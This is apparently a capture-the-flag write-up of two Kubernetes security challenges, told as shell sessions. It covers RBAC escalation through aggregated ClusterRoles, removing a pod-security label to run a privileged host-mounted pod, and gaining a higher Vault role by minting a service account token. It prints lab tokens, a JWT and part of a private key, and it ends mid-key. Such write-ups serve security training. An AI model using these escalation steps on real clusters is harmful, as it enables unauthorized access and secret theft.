Table of Contents

Introduction

As is tradition, it is another CNCF event with ControlPlane running another CTF. This time in Seattle at CloudNativeSecurityCon. Let’s have a stab at these 3 fresh new challenges :D

Unlike previous CTFs, I will not be on the scoreboard this time as I wasn’t going to be present in Seattle at the time. So I playtested the challenges before the CTF remotely on the day. However, to give an indication of the time I took - I spent about 1.5 hours to solve all 3 challenges not accounting for the time I took between challenges to write the writeups below.

Challenge 1 - Aggregation

SSHing into the first challenge, let’s see what our first objective is.

                    |    |    |
               )_)  )_)  )_)
              )___))___))___)
              )____)____)_____)
           _____|____|____|____\___
----------\                   /---------
  ^^^^^ ^^^^^^^^^^^^^^^^^^^^^
    ^^^^      ^^^     ^^^    ^^

                                       __/ \__
                                      /  o o  \
                                      |   o    |
                                      \  o o  /
                                       \_____/
                                        __/ \__
                                       /  o o  \
                                       |   o    |
                                       \  o o  /
                                        \_____/

Welcome, recruits, to Captain Hashjack's training range. The good cap'n has taken a break from sailing the high seas to train the next generation of fearsom bucaneers.

Here, he be teachin ye' some nuances of RBAC.

Honestly, theming these things gets tiring after a while. Have fun playing with some of the weirdnesses of RBAC. There's a flag in the default namespace and another on all of the nodes.

Interesting, looks like this will be some fun with RBAC. With the first flag being as a secret in the namespace, which probably needs some form of privilege escalation, followed by compromising the underlying nodes for the rest.

As this seems to be RBAC privilege escalation from the description, let’s start with viewing our permissions.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
clusterroles.rbac.authorization.k8s.io          []                                     [heights]        [*]
clusterroles.rbac.authorization.k8s.io          []                                     [spiders]        [*]
clusterroles.rbac.authorization.k8s.io          []                                     [tight-spaces]   [*]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
configmaps                                      []                                     []               [get list]
pods                                            []                                     []               [get list]
deployments.apps                                []                                     []               [get list]
*.rbac.authorization.k8s.io                     []                                     []               [get list]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]

so we have edit permissions on the heights, spiders, and tight-spaces cluster roles. This is done with the * verb, so we also have the escalate permission on these allowing us to modify them to grant all permissions - a typical privilege escalation technique. Let’s check which one applies to us:

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get rolebinding -o wide
NAME         ROLE              AGE   USERS   GROUPS   SERVICEACCOUNTS
entrypoint   ClusterRole/sum   25m                    default/entrypoint
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole sum -o yaml
aggregationRule:
  clusterRoleSelectors:
  - matchLabels:
      rbac.example.com/aggregate-to-sum: "true"
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  annotations:
    flag: flag_ctf{the_source_of_my_power}
  creationTimestamp: "2024-06-27T14:40:23Z"
  name: sum
  resourceVersion: "602"
  uid: d649a1fc-5688-4112-9ad0-9d4ffa7cd3a0
rules:
- apiGroups:
  - ""
  resources:
  - configmaps
  verbs:
  - get
  - list
- apiGroups:
  - apps
  resources:
  - deployments
  verbs:
  - get
  - list
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - get
  - list

Firstly, there’s our first flag. This wasn’t in the same place as said in the original message, but that should suggest the remaining 2 - the first is in secrets, the other is on the node.

So an initial look at the sum clusterrole which is bound to us through a rolebinding, it looks like it has an aggregation rule. This is basically where Kubernetes will aggregate multiple roles into one through a backend controller. So multiple roles combine to make this one, I wonder if that’s the 3 we have edit permissions for.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole heights -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: "2024-06-27T14:40:23Z"
  labels:
    rbac.example.com/aggregate-to-sum: "true"
  name: heights
  resourceVersion: "599"
  uid: fb29209e-139f-4a78-add6-222ee7b7a009
rules:
- apiGroups:
  - ""
  resources:
  - configmaps
  verbs:
  - get
  - list
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole spiders -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: "2024-06-27T14:40:23Z"
  labels:
    rbac.example.com/aggregate-to-sum: "true"
  name: spiders
  resourceVersion: "597"
  uid: 4add6f24-0858-406a-9246-9c1aeb643201
rules:
- apiGroups:
  - apps
  resources:
  - deployments
  verbs:
  - get
  - list
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole tight-spaces -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  creationTimestamp: "2024-06-27T14:40:23Z"
  labels:
    rbac.example.com/aggregate-to-sum: "true"
  name: tight-spaces
  resourceVersion: "601"
  uid: 3c028783-a39e-4017-98de-7955b78958e4
rules:
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - get
  - list

Yup, each of these are aggregated to make the sum role. This can be seen from the rbac.example.com/aggregate-to-sum: "true" label, which matches whats defined in the aggregation rule for sum. This means we can just modify one of these to get full administrator permissions within the namespace. We can add the following to represent all permissions:

- apiGroups:
  - '*'
  resources:
  - '*'
  verbs:
  - '*'

Adding this permission into tight-spaces:

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl edit clusterrole tight-spaces
clusterrole.rbac.authorization.k8s.io/tight-spaces edited
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get clusterrole sum -o yaml
aggregationRule:
  clusterRoleSelectors:
  - matchLabels:
      rbac.example.com/aggregate-to-sum: "true"
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  annotations:
    flag: flag_ctf{the_source_of_my_power}
  creationTimestamp: "2024-06-27T14:40:23Z"
  name: sum
  resourceVersion: "3303"
  uid: d649a1fc-5688-4112-9ad0-9d4ffa7cd3a0
rules:
- apiGroups:
  - ""
  resources:
  - configmaps
  verbs:
  - get
  - list
- apiGroups:
  - apps
  resources:
  - deployments
  verbs:
  - get
  - list
- apiGroups:
  - ""
  resources:
  - pods
  verbs:
  - get
  - list
- apiGroups:
  - '*'
  resources:
  - '*'
  verbs:
  - '*'

Excellent, our addition is now at the bottom of the cluster role. We should now have full permissions within the namespace. Meaning, we should now have access to the secrets within the namespace where a flag is meant to be.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get secret
NAME   TYPE     DATA   AGE
flag   Opaque   1      27m
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get secret -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: ZmxhZ19jdGZ7QWdncmVnYXRlX2lzX3VzZWRfaW5fbW9yZV90aGFuX2NvbmNyZXRlfQ==
  kind: Secret
  metadata:
    creationTimestamp: "2024-06-27T14:40:24Z"
    name: flag
    namespace: default
    resourceVersion: "605"
    uid: 486764aa-9036-4f55-aaba-22116f256772
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
root@entrypoint-deployment-776cc5bd94-fw2tt:~# base64 -d <<< ZmxhZ19jdGZ7QWdncmVnYXRlX2lzX3VzZWRfaW5fbW9yZV90aGFuX2NvbmNyZXRlfQ==
flag_ctf{Aggregate_is_used_in_more_than_concrete}

That’s the second flag, now we just need to get onto a node. We should be able to do that with a privileged pod.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# vim deploy.yml
root@entrypoint-deployment-776cc5bd94-fw2tt:~# cat deploy.yml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: testing
spec:
  selector:
    matchLabels:
      name: testing
  template:
    metadata:
      labels:
        name: testing
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        operator: Exists
        effect: NoSchedule
      hostNetwork: true
      hostPID: true
      containers:
      - name: testing
        image: skybound/net-utils
        imagePullPolicy: IfNotPresent
        args: ["sleep", "100d"]
        securityContext:
          privileged: true
        volumeMounts:
        - name: host
          mountPath: /host
      volumes:
      - name: host
        hostPath:
          path: /
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl apply -f deploy.yml
Warning: would violate PodSecurity "baseline:latest": host namespaces (hostNetwork=true, hostPID=true), hostPath volumes (volume "host"), privileged (container "testing" must not set securityContext.privileged=true)
deployment.apps/testing created
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get pods
NAME                                     READY   STATUS    RESTARTS   AGE
entrypoint-deployment-776cc5bd94-fw2tt   1/1     Running   0          31m
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get deployment
NAME                    READY   UP-TO-DATE   AVAILABLE   AGE
entrypoint-deployment   1/1     1            1           31m
testing                 0/1     0            0           8s
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get rs
NAME                               DESIRED   CURRENT   READY   AGE
entrypoint-deployment-776cc5bd94   1         1         1       31m
testing-7b95c8868                  1         0         0       13s

So we have a deployment, but no pod. The replica set was made, so let’s see where that is erroring out in creating the pod.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl describe rs testing-7b95c8868
Name:           testing-7b95c8868
Namespace:      default
Selector:       name=testing,pod-template-hash=7b95c8868
Labels:         name=testing
                pod-template-hash=7b95c8868
Annotations:    deployment.kubernetes.io/desired-replicas: 1
                deployment.kubernetes.io/max-replicas: 2
                deployment.kubernetes.io/revision: 2
Controlled By:  Deployment/testing
Replicas:       0 current / 1 desired
Pods Status:    0 Running / 0 Waiting / 0 Succeeded / 0 Failed
Pod Template:
  Labels:  name=testing
           pod-template-hash=7b95c8868
  Containers:
   testing:
    Image:      skybound/net-utils
    Port:       <none>
    Host Port:  <none>
    Args:
      sleep
      100d
    Environment:  <none>
    Mounts:
      /host from host (rw)
  Volumes:
   host:
    Type:          HostPath (bare host directory volume)
    Path:          /
    HostPathType:
Conditions:
  Type             Status  Reason
  ----             ------  ------
  ReplicaFailure   True    FailedCreate
Events:
  Type     Reason        Age               From                   Message
  ----     ------        ----              ----                   -------
  [..SNIP..]
  Warning  FailedCreate  1s (x4 over 19s)  replicaset-controller  (combined from similar events): Error creating: pods "testing-7b95c8868-fkpsv" is forbidden: violates PodSecurity "baseline:latest": host namespaces (hostNetwork=true, hostPID=true), hostPath volumes (volume "host"), privileged (container "testing" must not set securityContext.privileged=true)

Right, so it looks like Pod Security Admission is enforcing the baseline standard to pods within this namespace. We definitely don’t conform to that with this deployment. Luckily, we have full admin, so we can just change the namespaces labels to remove that restriction.

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get ns default
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2024-06-27T14:39:50Z"
  labels:
    kubernetes.io/metadata.name: default
    pod-security.kubernetes.io/enforce: baseline
  name: default
  resourceVersion: "3864"
  uid: 4ea287ab-cb7f-4173-b21b-9ae3fd43e598
spec:
  finalizers:
  - kubernetes
status:
  phase: Active
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl edit ns default
namespace/default edited
root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl get ns default
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2024-06-27T14:39:50Z"
  labels:
    kubernetes.io/metadata.name: default
  name: default
  resourceVersion: "3864"
  uid: 4ea287ab-cb7f-4173-b21b-9ae3fd43e598
spec:
  finalizers:
  - kubernetes
status:
  phase: Active

We have removed the pod-security.kubernetes.io/enforce: baseline line which tells Kubernetes which standard to enforce on this namespace. Without that label, it won’t enforce any standard meaning we can deploy to our hearts content :D.

Re-deploying the deployment, and success - the pod is deployed. Let’s use it to get the final flag:

root@entrypoint-deployment-776cc5bd94-fw2tt:~# kubectl exec -ti testing-7b95c8868-8xr9v -- bash
root@node-1:/# ls
bin  boot  dev	etc  home  host  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@node-1:/# cd host
root@node-1:/host# ls
bin  boot  dev	etc  home  lib	lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  snap	srv  swap-hibinit  sys	tmp  usr  var
root@node-1:/host# cd root/
root@node-1:/host/root# ls
flag.txt  snap
root@node-1:/host/root# cat flag.txt
flag_ctf{namespaces_arent_always_the_boundary_you_expect}

Nice, that was a good couple of RBAC techniques to get the flags.

Challenge 2 - Daylight Robbery

On to the second challenge:

Our targets are getting smarter, and started to keep their secrets in a vault instead of out in the open.

This is great, but we think we've found a way in. Leverage your initial access, and find those flags.

Interesting, this sounds like it plays with Hashicorp Vault. Let’s start by seeing our permissions:

root@entrypoint-deployment-776cc5bd94-nncdz:~# ls
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
serviceaccounts/token                           []                                     []               [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
pods/exec                                       []                                     []               [get create list]
pods/log                                        []                                     []               [get create list]
pods                                            []                                     []               [get create list]
nodes                                           []                                     []               [get list]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
serviceaccounts                                 []                                     []               [get]
services                                        []                                     []               [get]

So we have the permissions to get (not list which is an important distinction) service accounts and services, we can create new service account tokens and we can view pod logs and exec into them. The immediate starting point feels like the pods, so let’s start playing with them and see what we learn:

root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl logs production-workload-864c79df84-878wl
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                                       Value
---                                       -----
token                                     hvs.CAESIKSFW5jQD1cyabd3ExOdudaH5dsdi-SXP8qNikAQo8xHGh4KHGh2cy5SNlhIOU5KVVZMUmd5TlllclFUM1NzckU
token_accessor                            QDCcz7f4jcvEusClLJdAlxe4
token_duration                            24h
token_renewable                           true
token_policies                            ["app" "default"]
identity_policies                         []
policies                                  ["app" "default"]
token_meta_service_account_uid            e494f697-edcd-4640-9006-73a6dfbe52b2
token_meta_role                           app
token_meta_service_account_name           default
token_meta_service_account_namespace      default
token_meta_service_account_secret_name    n/a
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl logs dev-workload-c4f5d5484-jn62c
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                                       Value
---                                       -----
token                                     hvs.CAESIEdLtLYXf--Yns37hi29gKmgzQHFWTud-Nf5pIg_ZDaLGh4KHGh2cy5yTHpZRTJsYk1BR2pMQTlOelhxZGRsaDk
token_accessor                            Hj0y9saGPEggle5g9RMmfQsN
token_duration                            23h59m59s
token_renewable                           true
token_policies                            ["app" "default"]
identity_policies                         []
policies                                  ["app" "default"]
token_meta_role                           app
token_meta_service_account_name           default
token_meta_service_account_namespace      default
token_meta_service_account_secret_name    n/a
token_meta_service_account_uid            e494f697-edcd-4640-9006-73a6dfbe52b2

Interesting, so from the logs, it looks like it authenticates successfully to vault. We can also see some of the details about the token. This may come in useful later but nothing immediate off the bat. Let’s inspect the containers a bit more.

root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl exec -ti production-workload-864c79df84-878wl -- sh
# ls -alp
total 12
drwxr-xr-x 2 root root 4096 Jun 27 15:18 ./
drwxr-xr-x 1 root root 4096 Jun 27 15:18 ../
-rw-r--r-- 1 root root  336 Jun 27 15:18 index.html
# cat index.html
==== Secret Path ====
secret/data/prod_key

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:52.363865446Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

=== Data ===
Key    Value
---    -----
key    Yep, this is the prod key
#
# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2800  1792 ?        Ss   15:18   0:00 /bin/sh /startup/entrypoint.sh
root          22  0.0  0.4  26556 19840 ?        S    15:18   0:00 python3 -m http.server
root          33  0.0  0.0   2800  1664 pts/0    Ss   15:42   0:00 sh
root          40  0.0  0.0   7888  3712 pts/0    R+   15:43   0:00 ps aux
# cat /startup/entrypoint.sh
#!/bin/sh
curl -s http://vault.vault.svc.cluster.local:8200/v1/auth/kubernetes/login -d "{\"role\":\"app\",\"jwt\":\"$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\"}" | jq -r .auth.client_token | vault login -
vault kv get -mount=secret "$(echo $ENVIRONMENT)_key" > index.html
python3 -m http.server

It looks like the index.html just contains information about the prod_key secret. This was fetched as part of the entrypoint, and this also reinforces the container has been successfully authenticated against the Vault server. Let’s see what other secrets we can access from Vault:

# vault kv list -mount=secret /
Keys
----
dev_key
flag
flag2
prod_key
sshkey
# vault kv get -mount=secret flag
== Secret Path ==
secret/data/flag

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:52.133436487Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

==== Data ====
Key     Value
---     -----
flag    flag_ctf{all_your_secrets_are_belong_to_us}

There’s the first flag, we do get permission denied trying to read flag2 or sshkey though. This does kinda suggest the path forward for the challenge, flag2 will be the next step, and we get the sshkey at the same time which is likely to allow us to SSH onto the node to find the final flag.

# vault kv get -mount=secret flag2
Error reading secret/data/flag2: Error making API request.

URL: GET http://vault.vault.svc.cluster.local:8200/v1/secret/data/flag2
Code: 403. Errors:

* 1 error occurred:
	* permission denied
# vault kv get -mount=secret sshkey
Error reading secret/data/sshkey: Error making API request.

URL: GET http://vault.vault.svc.cluster.local:8200/v1/secret/data/sshkey
Code: 403. Errors:

* 1 error occurred:
	* permission denied

Vault permissions are defined via policies, I wonder if we have access to these.

# vault policy list
app
default
readallthethings
root

Yes we do, excellent. Remembering earlier, when we looked at the pod logs, the token we are currently authenticated with has permissions from the app and default policies. Let’s start with app, as that’s probably where the challenges permissions are from as its not… well default.

# vault policy read app
path "secret/*" {
  capabilities = ["read", "list"]
}

path "secret/data/flag2" {
  capabilities = ["deny"]
}

path "secret/data/sshkey" {
  capabilities = ["deny"]
}

path "sys/policies/*" {
  capabilities = ["read", "list"]
}

path "auth/kubernetes/role/*" {
  capabilities = ["read", "list"]
}

# vault policy read readallthethings
path "secret/*" {
  capabilities = ["read", "list"]
}

path "sys/policies/*" {
  capabilities = ["read", "list"]
}

path "auth/kubernetes/role/*" {
  capabilities = ["read", "list"]
}

OK, so we can see the explicit denies for flag2 and sshkey, but this says we have the permission to view information about roles that can authenticate via Kubernetes. As a bit of background, Vault does support authenticating Kubernetes service accounts and mapping these to roles. It uses the claims in the JWT token as part of the authorization steps to ensure it is permitted to access the role intended. Let’s see what information we can find about these. Also, looking at the readallthethings policy - which is also not a default one, this clearly does have permissions for everything - so ideally we get to a position we have this policy applied.

# vault list auth/kubernetes/role
Keys
----
app
readallthethings

OK, so we are authenticated as the app role, let’s see the details for the readallthethings role.

# vault read auth/kubernetes/role/readallthethings
Key                                         Value
---                                         -----
alias_name_source                           serviceaccount_uid
bound_service_account_names                 [vault-admin]
bound_service_account_namespace_selector    n/a
bound_service_account_namespaces            [default]
policies                                    [readallthethings]
token_bound_cidrs                           []
token_explicit_max_ttl                      0s
token_max_ttl                               0s
token_no_default_policy                     false
token_num_uses                              0
token_period                                0s
token_policies                              [readallthethings]
token_ttl                                   24h
token_type                                  default
ttl                                         24h

Simple enough, this looks to need the token for the vault-admin service account in the default namespace. These would be the claims it would look for in the JWT token. Luckily for us, we have the create token permission, so let’s see if the vault-admin account exists. If it does, we can re-authenticate with it.

root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl get sa vault-admin
NAME          SECRETS   AGE
vault-admin   0         33m
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl create token vault-admin
eyJhbGciOiJSUzI1NiIsImtpZCI6IjlXM004YjJucWRUQmMyNkJoMFcwWUlfN1lIdWdiaENNSmRzdm5TVWc5NHMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzE5NTA3MTAzLCJpYXQiOjE3MTk1MDM1MDMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6InZhdWx0LWFkbWluIiwidWlkIjoiODEyYTg3YzQtZDEzNi00YWJiLTkxM2MtY2I2Mjc5MGY4ODgyIn19LCJuYmYiOjE3MTk1MDM1MDMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OnZhdWx0LWFkbWluIn0.LAcqu_oz6N4kGvkq8nvNv1iMNGtjE-qoXemC-ChlGD5_TLtdV1Fix8wIuVwXHehZEwqQZBU6vIj7OvSEA36xWmwFtJLW4zpznOyg3vlU5IMId0qmRKf7KOKhPKswFfW-_a-mJ0R3vZP3bLaN8_XRK5_hy4IjcYY1DO5c-FSTFlIxZNvJDwhnYWuYoZw_PPgC0nGW2nPiJAzXF48d4u-pSsI74Qx6wboLBndWPQK0WbXxOjSH3GGTHVfj5uUjHfgTSI9GQa6LsyugZKgec1GOqUbC_IU0BtzQhBJU0ew6EWpByopUjeDfmLuEYkAxtGVNOCAjgwG8FCW-xJ6-Lj-V-Q

Now with a valid token, let’s save it as VAULT_SA in the pod and re-authenticate with it:

# curl -s http://vault.vault.svc.cluster.local:8200/v1/auth/kubernetes/login -d "{\"role\":\"app\",\"jwt\":\"$(echo $VAULT_SA)\"}" | jq -r .auth.client_token | vault login -
Error authenticating: error looking up token: Error making API request.

URL: GET http://vault.vault.svc.cluster.local:8200/v1/auth/token/lookup-self
Code: 403. Errors:

* permission denied

Oops - forgot to change the role we want to authenticate as…

# curl -s http://vault.vault.svc.cluster.local:8200/v1/auth/kubernetes/login -d "{\"role\":\"readallthethings\",\"jwt\":\"$(echo $VAULT_SA)\"}" | jq -r .auth.client_token | vault login -
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                                       Value
---                                       -----
token                                     hvs.CAESIF5kB_18IYYzwBkKIz8AzH_uV2Y87Cqy6dpjWaEb6avrGh4KHGh2cy5PbVM5eFhRWTBOTWlqWXpFUVVsSHpJT24
token_accessor                            jgXlsHyFhZAh2705GzOQvRDC
token_duration                            23h59m59s
token_renewable                           true
token_policies                            ["default" "readallthethings"]
identity_policies                         []
policies                                  ["default" "readallthethings"]
token_meta_role                           readallthethings
token_meta_service_account_name           vault-admin
token_meta_service_account_namespace      default
token_meta_service_account_secret_name    n/a
token_meta_service_account_uid            812a87c4-d136-4abb-913c-cb62790f8882

We’re in, we should now be able to get the second flag and the SSH key.

# vault kv get -mount=secret flag2
== Secret Path ==
secret/data/flag2

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:52.829295757Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

==== Data ====
Key     Value
---     -----
flag    flag_ctf{okay_now_its_all_the_secrets}

# vault kv get -mount=secret sshkey
=== Secret Path ===
secret/data/sshkey

======= Metadata =======
Key                Value
---                -----
created_time       2024-06-27T15:17:53.064203051Z
custom_metadata    <nil>
deletion_time      n/a
destroyed          false
version            1

====== Data ======
Key         Value
---         -----
key         LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFZRUFxa0RGdzhhd1BTMDE4K1pmLy9zU1lZSXl4aFRjR2VMbXY3WWppbTJXN1JZTDgxSEEraHZZClBpWkJVcjBkL0RZUGxuekZPNTBaMzNMQ1RoaEpCZnREalpyN0IvN3hWd3l3cDdGMy9XeE5LVTFkeUtGNmZyT3FTN3VvUm8KNWwzUHdvcGViYXZNS0ZZOExZc1NhZjYzV24wdVpxWGZYMGJldlp4a1JsWUxuS1ZzcDlJWWJZSmVkMkI3UzVNbmRuYkk4agpDWGhkWlV1Qlg0Mk5xb3B0bTBsWWo0NGxSK1JzRDFUcEdRS09SZUdRMzNFcU9UZjdOb3ROY1ZQaWJaa3ByWXErMTZHQk1ICm14RXM4THY4UWN1dTM3VnVWVk5JZkVXN2NZamNjN2xBejlBaFlFR1c5YWp5eWlkUzBBRG1IYTQ1TktycTRvNENKSkdMaVoKSzIyU3BpWHFLTE1XRjNndHRBWk1aVFUrZGJzcHZzZXg4ZWpMUmJ3NmhveENhY3g0WjNVZHBicDhQekFMaHJVVDdkS2dBQgo2bmxwZ2M0ejJpbVkxWW9CMER5eG9BQVpxb1QxbDdGSCtTbkFXeElUVysvTndkdTJTYWZRalpEMGxwa0FqaHlkcWFsb1RTCkZWbktpaHNWU29mRFhUOG14ZlBDUlJoSnFad2RUL242a3UxTFp3aWZBQUFGb0hkOWNJNTNmWENPQUFBQUIzTnphQzF5YzIKRUFBQUdCQUtwQXhjUEdzRDB0TmZQbVgvLzdFbUdDTXNZVTNCbmk1cisySTRwdGx1MFdDL05Sd1BvYjJENG1RVks5SGZ3MgpENVo4eFR1ZEdkOXl3azRZU1FYN1E0MmErd2YrOFZjTXNLZXhkLzFzVFNsTlhjaWhlbjZ6cWt1N3FFYU9aZHo4S0tYbTJyCnpDaFdQQzJMRW1uK3QxcDlMbWFsMzE5RzNyMmNaRVpXQzV5bGJLZlNHRzJDWG5kZ2UwdVRKM1oyeVBJd2w0WFdWTGdWK04KamFxS2JadEpXSStPSlVma2JBOVU2UmtDamtYaGtOOXhLamszK3phTFRYRlQ0bTJaS2EyS3Z0ZWhnVEI1c1JMUEM3L0VITApydCsxYmxWVFNIeEZ1M0dJM0hPNVFNL1FJV0JCbHZXbzhzb25VdEFBNWgydU9UU3E2dUtPQWlTUmk0bVN0dGtxWWw2aWl6CkZoZDRMYlFHVEdVMVBuVzdLYjdIc2ZIb3kwVzhPb2FNUW1uTWVHZDFIYVc2ZkQ4d0M0YTFFKzNTb0FBZXA1YVlIT005b3AKbU5XS0FkQThzYUFBR2FxRTlaZXhSL2twd0ZzU0UxdnZ6Y0hidGttbjBJMlE5SmFaQUk0Y25hbXBhRTBoVlp5b29iRlVxSAp3MTAvSnNYendrVVlTYW1jSFUvNStwTHRTMmNJbndBQUFBTUJBQUVBQUFHQU55TFM2UnduWnlpRkdIKzdCME5nS0lQcHZZCnh6MjA1SVBEM1lOTFJZOUY3M2I4MUNHYjE2d21YUk1lSmRHNWpHWTQzMHNlR214MTU2M3ArdXhta2c3M01KYVFWL1V4bWcKL0MzVkZoVkV4K051UTlOSHdGQ2ZEZmV2LzJtT1E0ckYvelJNRW1WTW5ZbzBjdXAzVCtIQ2YrSnZBQTd2SWNvSHROWGhudgptTU5aOU45dFdjbW1uako0dTNqa2h0RGhNczNaeEZZdENaRFVEaWFDQjhicFhLUUhOZ1QzQUNMdFRveUZpemlwNEtOTktKClFnNkhKSnJvY1pNZytTMW8rZks4WXI3ZkVrSjdPelAwSmJyK2IzK1ZsOVhPQmZCcnkrK1BjaUI1U3d5NTM5d2p3enNVU00KWXN1b3hiKzNXczVqK2ttdHdrQ3VYOVBUaWlXa0tCQTF3T2FHT3dwdFRYNmwrYklkZTlXdG5qT3ZwRTFLUlIxTWs5VWVHWQo3cVc4UzlIQS9ZMDRGZ1QrL1hGeGhNZ0JMRGRseU10SGZTL3BsdlgveDh0REsreW9jb3ByVEtDQ09weWxqNmR4N2V5dEVzClEwdGRUL0VxMHFmU0oreXp5aDFjYUJRU1UzUFFxekhLUk51Z1ArbWMrd1k1TzlxR01xdWYvSkthbFlpOEIrMnZvQkFBQUEKd1FDUXNYMndYcHFMS3U5VGtHWjJUajRXazBFTVdCUmZHUVBuTzFpUW1MT2ZhZkVMNW1yelFlalhZUjFRVHBQN1REbXJmegpZcTF6R3hsVkZtWXJWci9VQ3JUTTQ1Rkhub3NmTEJtVWtZSHRRZGdIeHhMbTBLK1dyVXVVb0FRbHZZcmJQeWhBZUhnVkIyCnhYK0dxa2Q5ZTl0NEt2MloyMTRDY0pqVWxBd2UvZ3RtWUQ3Qk1GT28rMTBRMWxaWjBwQm5QMzlUMUtVWWRVNFNJeHBQekUKOUY3U0JtQk5DQnBhQy9QSklKRTRvb3Rm